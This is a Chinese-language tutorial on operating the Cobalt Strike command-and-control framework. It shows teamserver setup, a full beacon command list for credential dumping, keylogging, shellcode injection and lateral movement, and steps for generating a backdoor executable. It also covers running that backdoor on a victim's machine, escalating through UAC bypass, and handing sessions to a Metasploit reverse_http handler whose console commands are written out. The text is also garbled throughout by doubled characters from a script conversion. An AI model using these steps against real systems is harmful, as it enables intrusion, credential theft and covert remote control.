如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來(lái)學(xué)習(xí)下，希望你能有所收獲。

一、介紹內(nèi)網(wǎng)滲透的神器工具CobaltStrike

Cobalt Strike 一款以Metasploit為基礎(chǔ)的GUI框架式滲透測(cè)試工具，集成了端口轉(zhuǎn)發(fā)、服務(wù)掃描，自動(dòng)化溢出，多模式端口監(jiān)聽(tīng)，exe、powershell木馬生成等。

釣魚攻擊包括：站點(diǎn)克隆，目標(biāo)信息獲取，java執(zhí)行，瀏覽器自動(dòng)攻擊等。

Cobalt Strike 主要用于團(tuán)隊(duì)作戰(zhàn)，可謂是團(tuán)隊(duì)滲透神器，能讓多個(gè)攻擊者同時(shí)連接到團(tuán)體服務(wù)器上，共享攻擊資源與目標(biāo)信息和sessions。

Cobalt Strike 作為一款協(xié)同APT工具，針對(duì)內(nèi)網(wǎng)的滲透測(cè)試和作為apt的控制終端功能，使其變成眾多APT組織的首選。

文件內(nèi)容如下：

二、啟動(dòng)CobaltStrike

1.啟動(dòng)服務(wù)端CobaltStrike

服務(wù)端關(guān)鍵文件teamserver與cobaktstrike.jar

打開(kāi)命令界面，切換到文件夾目錄下，輸入sudo ./teamserver <host> <password> [/path/to/c2.profile]

1 - 必填參數(shù)host 本服務(wù)器外網(wǎng)IP/域名

2 - 必填參數(shù)password Client GUI連接時(shí)需要輸入的密碼

3 - 可選參數(shù)Malleable C2 communication profile 指定C2通信配置文件該功能體現(xiàn)了CS

示例：本機(jī)IP：192.168.1.136

2.打開(kāi)客戶端cobaltstrike.jar，配置按照啟動(dòng)服務(wù)的配置進(jìn)行。

點(diǎn)擊連接，進(jìn)入主界面。

三、參數(shù)介紹

1.Cobalt Strike

1- 新建鏈接（可以支持多個(gè)服務(wù)端）

2- 設(shè)置（配置控制臺(tái)界面）

3- 可視化（展示控制的形式）

4- VPN接口（配置VPN）

5- 監(jiān)聽(tīng)器（管理監(jiān)聽(tīng)配置）

6- 腳本管理器（管理腳本，用于管理第三方腳本）

2.視圖

1- 應(yīng)用信息（顯示被攻擊著的機(jī)器的應(yīng)用信息）

2- 憑證信息（通過(guò)hashdump或者獼猴桃抓到的密碼都會(huì)保存到此處）

3- 文件下載（下載文件）

4- 日志（事件記錄）

5- 鍵盤記錄

6- 代理信息

7- 屏幕截圖（截取被攻擊者的屏幕）

8- 腳本控制臺(tái)（腳本的命令執(zhí)行的界面）

9- 目標(biāo)（顯示目標(biāo)主機(jī)）

10- web日志

3.攻擊

1- HTML Application （生成惡意的HTA木馬文件）

2- MS Office Macro （生成office宏病毒文件）

3- Payload Generator （生成各種語(yǔ)言版本的payload）

4- Windows Executable （生成可執(zhí)行Payload）

5- Windows Executable(S)（把包含payload,Stageless生成可執(zhí)行文件(包含多數(shù)功能）

1- web服務(wù)管理（對(duì)開(kāi)啟的web服務(wù)進(jìn)行管理）

2- 克隆網(wǎng)站

3- 文件下載（提供web下載文件）

4- Scripted Web Delivery （提供Web服務(wù)，便于下載和執(zhí)行PowerShell Payload，類似于Metasploit的web_delivery）

5- 簽名Applet攻擊（啟動(dòng)一個(gè)Web服務(wù)以提供自簽名Java Applet的運(yùn)行環(huán)境）

6- 智能攻擊（自動(dòng)檢測(cè)Java版本并利用已知的exploits繞過(guò)security）

7- 信息搜集（獲取系統(tǒng)信息）

4.beacon命令

beacon> help

Beacon Commands

===============

Command                   Description

-------                   -----------

argue                     進(jìn)程參數(shù)欺騙

blockdlls                 阻止子進(jìn)程加載非Microsoft DLL

browserpivot              注入受害者瀏覽器進(jìn)程

bypassuac                 繞過(guò)UAC提升權(quán)限

cancel                    取消正在進(jìn)行的下載

cd                        切換目錄

checkin                   強(qiáng)制讓被控端回連一次

clear                     清除beacon內(nèi)部的任務(wù)隊(duì)列

connect                   Connect to a Beacon peer over TCP

covertvpn                 部署Covert VPN客戶端

cp                        復(fù)制文件

dcsync                    從DC中提取密碼哈希

desktop                   遠(yuǎn)程桌面(VNC)

dllinject                 反射DLL注入進(jìn)程

dllload                   使用LoadLibrary將DLL加載到進(jìn)程中

download                  下載文件

downloads                 列出正在進(jìn)行的文件下載

drives                    列出目標(biāo)盤符

elevate                   使用exp

execute                   在目標(biāo)上執(zhí)行程序(無(wú)輸出)

execute-assembly          在目標(biāo)上內(nèi)存中執(zhí)行本地.NET程序

exit                      終止beacon會(huì)話

getprivs                  Enable system privileges on current token

getsystem                 嘗試獲取SYSTEM權(quán)限

getuid                    獲取用戶ID

hashdump                  轉(zhuǎn)儲(chǔ)密碼哈希值

help                      幫助

inject                    在注入進(jìn)程生成會(huì)話

jobkill                   結(jié)束一個(gè)后臺(tái)任務(wù)

jobs                      列出后臺(tái)任務(wù)

kerberos_ccache_use       從ccache文件中導(dǎo)入票據(jù)應(yīng)用于此會(huì)話

kerberos_ticket_purge     清除當(dāng)前會(huì)話的票據(jù)

kerberos_ticket_use       Apply 從ticket文件中導(dǎo)入票據(jù)應(yīng)用于此會(huì)話

keylogger                 鍵盤記錄

kill                      結(jié)束進(jìn)程

link                      Connect to a Beacon peer over a named pipe

logonpasswords            使用mimikatz轉(zhuǎn)儲(chǔ)憑據(jù)和哈希值

ls                        列出文件

make_token                創(chuàng)建令牌以傳遞憑據(jù)

mimikatz                  運(yùn)行mimikatz

mkdir                     創(chuàng)建一個(gè)目錄

mode dns                  使用DNS A作為通信通道(僅限D(zhuǎn)NS beacon)

mode dns-txt              使用DNS TXT作為通信通道(僅限D(zhuǎn) beacon)

mode dns6                 使用DNS AAAA作為通信通道(僅限D(zhuǎn)NS beacon)

mode http                 使用HTTP作為通信通道

mv                        移動(dòng)文件

net                       net命令

note                      備注

portscan                  進(jìn)行端口掃描

powerpick                 通過(guò)Unmanaged PowerShell執(zhí)行命令

powershell                通過(guò)powershell.exe執(zhí)行命令

powershell-import         導(dǎo)入powershell腳本

ppid                      Set parent PID for spawned post-ex jobs

ps                        顯示進(jìn)程列表

psexec                    Use a service to spawn a session on a host

psexec_psh                Use PowerShell to spawn a session on a host

psinject                  在特定進(jìn)程中執(zhí)行PowerShell命令

pth                       使用Mimikatz進(jìn)行傳遞哈希

pwd                       當(dāng)前目錄位置

reg                       Query the registry

rev2self                  恢復(fù)原始令牌

rm                        刪除文件或文件夾

rportfwd                  端口轉(zhuǎn)發(fā)

run                       在目標(biāo)上執(zhí)行程序(返回輸出)

runas                     以其他用戶權(quán)限執(zhí)行程序

runasadmin                在高權(quán)限下執(zhí)行程序

runu                      Execute a program under another PID

screenshot                屏幕截圖

setenv                    設(shè)置環(huán)境變量

shell                     執(zhí)行cmd命令

shinject                  將shellcode注入進(jìn)程

shspawn                   啟動(dòng)一個(gè)進(jìn)程并將shellcode注入其中

sleep                     設(shè)置睡眠延遲時(shí)間

socks                     啟動(dòng)SOCKS4代理

socks stop                停止SOCKS4

spawn                     Spawn a session

spawnas                   Spawn a session as another user

spawnto                   Set executable to spawn processes into

spawnu                    Spawn a session under another PID

ssh                       使用ssh連接遠(yuǎn)程主機(jī)

ssh-key                   使用密鑰連接遠(yuǎn)程主機(jī)

steal_token               從進(jìn)程中竊取令牌

timestomp                 將一個(gè)文件的時(shí)間戳應(yīng)用到另一個(gè)文件

unlink                    Disconnect from parent Beacon

upload                    上傳文件

wdigest                   使用mimikatz轉(zhuǎn)儲(chǔ)明文憑據(jù)

winrm                     使用WinRM橫向滲透

wmi                       使用WMI橫向滲透

四、使用Cobalt strike

1.創(chuàng)建監(jiān)聽(tīng)器

注：cs中提供了8種監(jiān)聽(tīng)器:

beacon_xx 系列為Cobalt Strike自身，包括 dns、http、https、smb 四種方式的監(jiān)聽(tīng)器。

foreign系列為外部監(jiān)聽(tīng)器，通常與MSF或者Armitage聯(lián)動(dòng)。

創(chuàng)建好之后會(huì)顯示監(jiān)聽(tīng)開(kāi)始

2.生成后門

點(diǎn)擊攻擊----生成后門---Windows Executable

監(jiān)聽(tīng)器選擇我們剛才創(chuàng)建的，根據(jù)攻擊的系統(tǒng)選擇64位還是32位。

保存生成后門的exe文件。

3.連接

將生成的后門程序，上傳到受害者的機(jī)器上，運(yùn)行，發(fā)現(xiàn)主機(jī)上線。

在主機(jī)右鍵，進(jìn)入beacon，可以進(jìn)行下一步命令執(zhí)行操作。

備注：beacon的命令執(zhí)行功能較少用起來(lái)不方便，可以使用Ladon腳本。

Ladon腳本下載地址：https://github.com/k8gege/Ladon

Ladon具體使用方法：https://github.com/k8gege/Aggressor

4.提權(quán)

在上線主機(jī)右鍵后，點(diǎn)擊提權(quán)，選擇uac提權(quán)。

成功后會(huì)出現(xiàn)一個(gè)新的主機(jī)。之后的操作可以在新的主機(jī)進(jìn)行。

五、與MSF聯(lián)動(dòng)

Kali IP：172.16.20.18

受害者機(jī)器：172.16.20.20

CS：172.16.20.19

1.在MSF中創(chuàng)建監(jiān)聽(tīng)器

msf5 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf5 exploit(multi/handler) > set lhost 172.16.20.18

lhost => 172.16.20.18

msf5 exploit(multi/handler) > set lport 3333

lport => 3333

msf5 exploit(multi/handler) > run

注：監(jiān)聽(tīng)監(jiān)聽(tīng)kali自身地址。

2.在CS中設(shè)置新的監(jiān)聽(tīng)地址

注意：payload要與msf中的payload要一致。

在控制中右鍵--增加會(huì)話，選擇msf的會(huì)話。

此時(shí)拿到meterpreter。

輸入shell，進(jìn)入主機(jī)命令操作。

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注億速云行業(yè)資訊頻道，感謝您對(duì)億速云的支持。